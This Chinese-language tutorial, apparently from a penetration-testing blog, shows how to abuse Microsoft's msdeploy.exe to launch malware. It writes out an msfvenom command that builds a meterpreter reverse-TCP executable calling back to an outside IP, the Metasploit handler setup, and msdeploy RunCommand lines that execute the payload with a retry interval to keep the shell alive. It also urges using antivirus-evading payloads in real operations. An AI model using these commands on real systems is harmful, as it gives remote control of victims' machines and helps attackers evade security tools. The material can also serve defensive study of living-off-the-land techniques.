當你的才華
還撐不起你的野心時
那你就應該靜下心來學習
目錄
0x01 msdeloy.exe介紹
msdeploy.exe是微軟提供的web部署命令行工具,通過它可以方便的部署web應用、數據庫等,路徑在C:\Program Files\IIS\Microsoft Web Deploy V3。msdeloy.exe可以使IIS可以在本地或遠程同步,打包和部署Web應用程序,網站或Web服務器內容和配置。它具有衆多功能,這些功能可以高度精確地包括要處理的那些組件,並排除那些不需要的組件。爲了能夠使用Web Deploy,必須已在源計算機和目標計算機上安裝IIS。
msdeloy的命令參數繁雜,想要通過msdelopy來執行payload我們需要了解以下的幾個參數:
-verb:<verbName>:指定Web Deploy動作即需要對源對象或目標對象執行的操作。<verbName>必須爲以下之一:delete,dump,getDependencies,getSystemInfo或sync。sync即synchronize(同步操作),需要指定源對象和目標對象。
-source:<provider>:指定動作參數的數據源。source是同步和轉儲操作的必需參數,但不是delete操作的必備參數。可以使用msdeploy.exe -source -help命令查看關於source參數幫助,其中有一RunCommand參數可以在調用同步時在目標運行命令。
-dest: <provider>:指定sync/delete操作的目的地。僅當指定了sync或delete動詞時,-dest參數纔是必需的。-dest參數所使用的<provider>程序、其路徑和設置是與-source參數是一致的。
0x02 msdeloy.exe執行payload
通過執行.exe文件執行payload,生成.exe木馬文件的方式有很多種在實戰中可以選擇免殺效果較好的。爲了方便演示直接使用msf生成的木馬文件:
msfvenom -f exe -p windows/meterpreter/reverse_tcp lhost=192.168.19.146 lport=23333 > w_re.exe
msf監聽:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.19.146
set lport 23333
exploit
複製文件到本地使用msdeploy執行:
msdeploy.exe -verb:sync -source:RunCommand -dest:Runcommand="C:\Program Files\IIS\Microsoft Web Deploy V3\w_re.exe"
不添加執行重試間隔時間的情況下,該進程建立之後會中斷重試,得到會話存活時間很短。
使用waitinterval參數指定較長的程序重試時間間隔,以得到穩定會話。
msdeploy.exe -verb:sync -source:RunCommand -dest:Runcommand="C:\Program Files\IIS\Microsoft Web Deploy V3\w_re.exe",waitinterval=15000000
開啓火絨和360的情況下會報警並清除木馬文件:
使用virustotal.com檢查:由於使用msfvenom原生木馬,查殺率相當感人:
參考資料:
lolbas-msdploy:https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/#awl%20bypass
微軟mesdploy文檔:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee619740%28v%3dws.10%29
msdeploy-runcommand參數文檔:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee619740%28v%3dws.10%29
雖然我們生活在陰溝裏,但依然有人仰望星空!